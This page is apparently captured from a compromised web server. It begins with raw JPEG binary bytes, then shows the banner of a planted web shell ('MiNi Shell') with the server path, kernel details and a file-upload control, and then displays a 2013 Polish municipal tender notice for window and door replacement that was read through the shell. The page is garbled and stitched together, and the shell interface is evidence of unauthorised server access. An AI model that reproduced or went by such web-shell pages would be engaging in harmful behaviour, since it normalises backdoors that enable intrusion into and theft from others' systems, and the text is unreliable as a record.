JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130426/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130426/168280-N-2013.html

<p class="kh_header"><b>Jastrzębie-Zdrój: Wymiana stolarki okiennej drewnianej, stolarki okiennej i drzwiowej aluminiowej</b><br>
<b>Numer ogłoszenia: 168280 - 2013; data zamieszczenia: 26.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Nieruchomości , ul. 1-go Maja 55, 44-330 Jastrzębie-Zdrój, woj. śląskie, tel. 032 4787001, faks 032 4762952.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzn.jastrzebie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana stolarki okiennej drewnianej, stolarki okiennej i drzwiowej aluminiowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I: Wymiana stolarki okiennej drewnianej  w budynkach mieszkalnych  administrowanych przez MZN W Jastrzębiu-Zdroju.
Przedmiotem zamówienia jest wymiana okien drewnianych (w tym jedno okno dachowe) w budynkach mieszkalnych wielorodzinnych administrowanych przez Miejski Zarząd Nieruchomości w Jastrzębiu - Zdroju 
o ogólnej powierzchni  nie przekraczającej 323,50 m2. 
Zestawienie stolarki okiennej drewnianej do wymiany zawiera załącznik nr 4 do STWiOR.
Zakres robót wraz z opisem technicznym stolarki, sposobem wyceny robót oraz wymaganiami dotyczącymi sposobu montażu okien zawarty jest w Załączniku do SIWZ Specyfikacja Techniczna Wykonania i Odbioru Robót.
Termin ustalenia adresów wraz z typami okien i drzwi balkonowych oraz zatwierdzenie pomiarów - do 30 dni od podpisania umowy.
Przedmiot zamówienia należy wykonać zgodnie z STWiOR, przepisami prawa budowlanego, wiedzą techniczną i obowiązującymi normami. 
Dokumentacja  jest załącznikiem do ogłoszenia o przetargu i jest dostępna na stronie internetowej Zamawiającego:  www.mzn.jastrzebie.pl.
Wycena oferty winna uwzględniać wszystkie koszty i czynności niezbędne do wykonania przedmiotu  zamówienia zgodnie z prawem i najlepszą wiedzą techniczną oraz STWiOR.
Zamawiający przewiduje  możliwość weryfikacji  parametrów  technicznych stolarki, a w szczególności wkładów  okiennych przy pomocy  specjalistycznego sprzętu.

Część II: Wymiana stolarki okiennej drewnianej  w lokalach Poczty Polskiej  przy ul. 1 Maja 45 w Jastrzębiu-Zdroju.
 Przedmiotem zamówienia jest wymiana okien drewnianych w lokalach zajmowanych przez Pocztę Polską w budynku przy ul. 1 Maja 45 w Jastrzębiu-Zdroju w ilości i o wymiarach:
12 szt. - o wym.: 124x202 cm
1 szt. - o wym.: 94x117 cm
Zakres robót wraz z opisem technicznym stolarki, sposobem wyceny robót oraz wymaganiami dotyczącymi sposobu montażu okien zawarty jest w Załączniku do SIWZ Specyfikacja Techniczna Wykonania i Odbioru Robót.
Przedmiot zamówienia należy wykonać zgodnie z STWiOR, przedmiarem robót, przepisami prawa budowlanego, wiedzą techniczną i obowiązującymi normami. 
Dokumentacja  jest załącznikiem do ogłoszenia o przetargu i jest dostępna na stronie internetowej Zamawiającego:  www.mzn.jastrzebie.pl.
Wycena oferty winna uwzględniać wszystkie koszty i czynności niezbędne do wykonania przedmiotu  zamówienia zgodnie z prawem i najlepszą wiedzą techniczną oraz STWiOR.
Zamawiający przewiduje  możliwość weryfikacji  parametrów  technicznych stolarki, a w szczególności wkładów  okiennych przy pomocy  specjalistycznego sprzętu.

Część III: Wymiana stolarki okiennej i drzwiowej w środkowym segmencie budynku przy ul. Jasnej 1A.
Przedmiotem zamówienia jest częściowa wymiana stolarki okiennej i drzwiowej w budynku przy ul. Jasnej 1A (segment środkowy) w Jastrzębiu-Zdroju wraz z wszystkimi robotami towarzyszącymi:
demontaż stolarki stalowej (witryny) o wymiarach:
Elewacja wschodnia
15,9m x 2,4m (w tym 3szt. drzwi szerokości 0,96m i wysokości 3,0m) + 1,97m x 1,5m
Elewacja zachodnia
18,1m x 2,4m (w tym 4szt. drzwi szerokości 0,96m i wysokości 3,0m)
podział otworów okiennych słupkami z bloczków betonu komórkowego i montaż stolarki okiennej i drzwiowej wg załączonych do STWiOR szkiców.
Przedmiot zamówienia należy wykonać zgodnie z STWiOR, przepisami prawa budowlanego, wiedzą techniczną i obowiązującymi normami. Przedmiar robót należy traktować jako dokument pomocniczy.
Dokumentacja  jest załącznikiem do ogłoszenia o przetargu i jest dostępna na stronie internetowej Zamawiającego:  www.mzn.jastrzebie.pl
Wycena oferty winna uwzględniać wszystkie koszty i czynności niezbędne do wykonania przedmiotu  zamówienia zgodnie z prawem i najlepszą wiedzą techniczną oraz STWiOR.
Zamawiający przewiduje  możliwość weryfikacji  parametrów  technicznych stolarki, a w szczególności wkładów  okiennych przy pomocy  specjalistycznego sprzętu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.32-8, 45.42.11.30-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 84.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium w wysokości:
Część I: 2.500,00 zł  brutto (słownie: dwa tysiące pięćset złotych 00/100);
Część II: 500,00 zł  brutto (słownie: pięćset złotych 00/100);
Część III: 700,00 zł brutto (słownie: siedemset złotych 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie będzie podlegał ocenie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert 1 zadanie o charakterze  podobnym do przedmiotu zamówienia o wartości minimum:
Część I: 180.000,00 zł brutto;
Część II: 40.000,00 zł brutto;
Część III: 60.000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie będzie podlegał ocenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy części I, II i III - Wykonawca wykaże, że dysponuje lub będzie dysponować przy wykonywanych pracach osobą, która będzie pełnić funkcję kierownika budowy posiadającego uprawnienia budowlane w specjalności konstrukcyjno-budowlanej do kierowania robotami budowlanymi.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie będzie podlegał ocenie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) wypełniony druk OFERTA stanowiący załącznik nr 1 do niniejszej specyfikacji zawierający oświadczenie, że Wykonawca spełnia wszystkie warunki określone w specyfikacji istotnych warunków zamówienia oraz w art. 22 ust. 1 ustawy Prawo zamówień;
b) pisemne zobowiązanie wg załącznika nr 7 do SIWZ innych podmiotów do udostępnienia zasobów niezbędnych do wykonania zamówienia lub inny dokument z którego wynikać będzie, że Wykonawca takimi zasobami będzie dysponował, jeżeli przy realizacji zadania polegać będzie na zasobach niezbędnych do wykonania zamówienia innego podmiotu;
c) pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu, z którego wynika zakres,    podpisane przez  osoby uprawnione do reprezentowania Firmy (jeżeli Wykonawca jest reprezentowany przez pełnomocnika lub jeżeli istnieje ustawowy obowiązek ustanowienia pełnomocnika - jak w punkcie  11 SIWZ);
Uwaga: Pełnomocnictwo powinno być przedstawione w oryginale lub kserokopii poświadczonej notarialnie
d) W przypadku Wykonawcy mającego siedzibę na terytorium Rzeczypospolitej Polskiej, wobec osób, o których mowa w art. 24 ust. 1 pkt 5-8, 10 i 11 ustawy, mających miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Wykonawca składa w odniesieniu do nich zaświadczenie właściwego organu sądowego albo administracyjnego miejsca zamieszkania, dotyczące niekaralności tych osób w zakresie określonym w art. 24 ust. 1 pkt 5-8, 10 i 11 ustawy, wystawione nie wcześniej niż 6 miesięcy przed składaniem ofert, z tym że w przypadku gdy w miejscu zamieszkania tych osób nie wydaje się takich zaświadczeń - zastępuje się je dokumentem zawierającym oświadczenie złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego miejsca zamieszkania tych osób lub przed notariuszem. 
e) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, a w kraju nie wydaje się dokumentów potwierdzających, że nie otwarto jego likwidacji i ani nie ogłoszono upadłości, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Dokument winnień być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający zastrzega sobie możliwość dokonania zmian postanowień umownych w przypadku:
a) śmierci, choroby, innych zdarzeń losowych, z przyczyn niezależnych od Wykonawcy, zmian kadrowo - personalnych, utraty stanowiska;
b) wystąpienia okoliczności, których Zamawiający nie był w stanie przewidzieć, pomimo zachowania należytej staranności;
c) zmniejszenia zakresu wynagrodzenia z przyczyn o obiektywnym charakterze, istotnej zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia (zapis w umowie będzie dotyczył tylko części I);
d) zmniejszenia zakresu rzeczowego zamówienia określonego umową, który może zostać ograniczony przez Zamawiającego, bez skutków finansowych i prawnych dla Zamawiającego, gdy wykonanie przedmiotu zamówienia w pełnym zakresie nie leży w interesie publicznym, czego nie można było wcześniej przewidzieć (zapis w umowie będzie dotyczył tylko części I);
e) zmiany dotyczącej nazw, siedziby Wykonawcy lub jego formy organizacyjno-prawnej w trakcie trwania umowy, numerów kont bankowych oraz innych danych identyfikacyjnych;
f) zmian prowadzących do likwidacji oczywistych omyłek pisarskich i rachunkowych w treści umowy; 
g) zmian w zakresie podwykonawców, wykazanych na etapie złożonej oferty lub, których konieczność ujawnienia wynikła na etapie realizacji zamówienia, którym Wykonawca powierzył lub ma zamiar powierzyć wykonanie części zamówienia.
2. Zamawiający może także zażądać od Wykonawcy zmiany kierownika budowy, jeżeli uzna, że nie wykonuje należycie swoich obowiązków. Wykonawca zobowiązany jest dokonać zmiany tej osoby w terminie nie dłuższym niż 2 dni od daty złożenia wniosku Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzn.jastrzebie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Nieruchomości
44-330 Jastrzębie-Zdrój, ul. 1 Maja 55.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.05.2013 godzina 09:00, miejsce: Miejski Zarząd Nieruchomości
44-330 Jastrzębie-Zdrój, ul. 1 Maja 55
pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wymiana stolarki okiennej drewnianej  w budynkach mieszkalnych  administrowanych przez MZN W Jastrzębiu-Zdroju.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wymiana okien drewnianych (w tym jedno okno dachowe) w budynkach mieszkalnych wielorodzinnych administrowanych przez Miejski Zarząd Nieruchomości w Jastrzębiu - Zdroju 
o ogólnej powierzchni  nie przekraczającej 323,50 m2. 
Zestawienie stolarki okiennej drewnianej do wymiany zawiera załącznik nr 4 do STWiOR.
Zakres robót wraz z opisem technicznym stolarki, sposobem wyceny robót oraz wymaganiami dotyczącymi sposobu montażu okien zawarty jest w Załączniku do SIWZ Specyfikacja Techniczna Wykonania i Odbioru Robót.
Termin ustalenia adresów wraz z typami okien i drzwi balkonowych oraz zatwierdzenie pomiarów - do 30 dni od podpisania umowy.

Przedmiot zamówienia należy wykonać zgodnie z STWiOR, przepisami prawa budowlanego, wiedzą techniczną  i obowiązującymi normami. 
Dokumentacja  jest załącznikiem do ogłoszenia o przetargu i jest dostępna na stronie internetowej Zamawiającego:  www.mzn.jastrzebie.pl.
Wycena oferty winna uwzględniać wszystkie koszty i czynności niezbędne do wykonania przedmiotu  zamówienia zgodnie z prawem i najlepszą wiedzą techniczną oraz STWiOR.
 Zamawiający przewiduje  możliwość weryfikacji  parametrów  technicznych stolarki, a w szczególności wkładów  okiennych przy pomocy  specjalistycznego sprzętu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.32-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 112.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wymiana stolarki okiennej drewnianej  w lokalach Poczty Polskiej  przy ul. 1 Maja 45                             w Jastrzębiu-Zdroju.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wymiana okien drewnianych w lokalach zajmowanych przez Pocztę Polską 
w budynku przy ul. 1 Maja 45 w Jastrzębiu-Zdroju w ilości i o wymiarach:
12 szt. - o wym.: 124x202 cm
1 szt. - o wym.: 94x117 cm
Zakres robót wraz z opisem technicznym stolarki, sposobem wyceny robót oraz wymaganiami dotyczącymi sposobu montażu okien zawarty jest w Załączniku do SIWZ Specyfikacja Techniczna Wykonania i Odbioru Robót.

Przedmiot zamówienia należy wykonać zgodnie z STWiOR, przedmiarem robót, przepisami prawa budowlanego, wiedzą techniczną i obowiązującymi normami. 
Dokumentacja  jest załącznikiem do ogłoszenia o przetargu i jest dostępna na stronie internetowej Zamawiającego:  www.mzn.jastrzebie.pl.
Wycena oferty winna uwzględniać wszystkie koszty i czynności niezbędne do wykonania przedmiotu  zamówienia zgodnie z prawem i najlepszą wiedzą techniczną oraz STWiOR.
Zamawiający przewiduje  możliwość weryfikacji  parametrów  technicznych stolarki, a w szczególności wkładów  okiennych przy pomocy  specjalistycznego sprzętu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.32-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 84.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wymiana stolarki okiennej i drzwiowej w środkowym segmencie budynku przy 
ul. Jasnej 1A.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest częściowa wymiana stolarki okiennej i drzwiowej w budynku przy ul. Jasnej 1A (segment środkowy) w Jastrzębiu-Zdroju wraz z wszystkimi robotami towarzyszącymi:
demontaż stolarki stalowej (witryny) o wymiarach:
Elewacja wschodnia
15,9m x 2,4m (w tym 3szt. drzwi szerokości 0,96m i wysokości 3,0m) + 1,97m x 1,5m
Elewacja zachodnia
18,1m x 2,4m (w tym 4szt. drzwi szerokości 0,96m i wysokości 3,0m)
podział otworów okiennych słupkami z bloczków betonu komórkowego i montaż stolarki okiennej i drzwiowej wg załączonych do STWiOR szkiców.

Przedmiot zamówienia należy wykonać zgodnie z STWiOR, przepisami prawa budowlanego, wiedzą techniczną i obowiązującymi normami. Przedmiar robót należy traktować jako dokument pomocniczy.
Dokumentacja  jest załącznikiem do ogłoszenia o przetargu i jest dostępna na stronie internetowej Zamawiającego:  www.mzn.jastrzebie.pl
Wycena oferty winna uwzględniać wszystkie koszty i czynności niezbędne do wykonania przedmiotu  zamówienia zgodnie z prawem i najlepszą wiedzą techniczną oraz STWiOR.
Zamawiający przewiduje  możliwość weryfikacji  parametrów  technicznych stolarki, a w szczególności wkładów  okiennych przy pomocy  specjalistycznego sprzętu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.32-8, 45.42.11.30-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com